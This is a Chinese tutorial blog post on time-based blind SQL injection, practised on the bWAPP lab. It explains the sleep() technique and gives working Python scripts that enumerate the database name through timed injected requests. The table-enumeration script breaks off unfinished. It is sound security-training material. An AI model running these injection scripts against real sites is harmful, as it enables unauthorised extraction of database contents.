基于时间的盲注

基于时间的盲注

该部分学习以bwapp靶场为列,这是个漫长的过程

SQL Injection - Blind - Time-Based时间盲注关卡

一、简介
1.什么是时间盲注?

​ 时间盲注,通过时间函数使SQL语句执行时间延长,从页面响应时间判断条件是否正确的一种注入方式。用到的函数为sleep()。

2.测试是否存在时间盲注

输入Iron Man后搜索耗时

在这里插入图片描述

当输入 Iron Man’ and sleep(5) 时出现

在这里插入图片描述

通过对比,发现时间盲注漏洞,sleep(5)当and前的条件为真会执行,并且找到一条会sleep()5秒

3.思路

通过延长时间来逐步获取想要的数据,

二、实践靶场

通过python脚本来获取

1.获得数据库的库名长度与库名
import requests
import time

header = {
   
    'Cookie': 'security_level=0; PHPSESSID=6slp3ivhn2rb2uph8catcbq5a6'
}
baseurl = 'http://8.130.109.21:9999/sqli_15.php?'


# 获取数据库的长度
def get_database_name_length() -> int:
    count = 0
    for i in range(40):
        url = baseurl + "title=Iron Man' and length(database())={} and sleep(2) -- &action=search".format(i)
        stat_time = time.time()
        requests.get(url, headers=header)
        if time.time() - stat_time > 1:
            print("数据库库名长度为:{}".format(i))
            count = i
    return count


# 获取数据库的名字
def get_database_name(count):
    print("数据库名是:", end='')
    for i in range(count + 1):
        for j in range(33, 127):
            url = baseurl + "title=Iron Man' and ascii(substr(database(),{},1))={} and sleep(2) -- &action=search".format(
                i, j)
            stat_time = time.time()
            requests.get(url, headers=header)
            if time.time() - stat_time > 1:
                print(chr(j), end='')


if __name__ == '__main__':
    get_database_name(get_database_name_length())

运行结果:

在这里插入图片描述

2.获取数据库中表,包括表的个数,表名以及表的长度
import requests
import time

header = {
   
    'Cookie': 'security_level=0; PHPSESSID=6slp3ivhn2rb2uph8catcbq5a6'
}
baseurl = 'http://8.130.109.21:9999/sqli_15.php?'

# 获取当前数据库中表的个数
def get_table_count
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值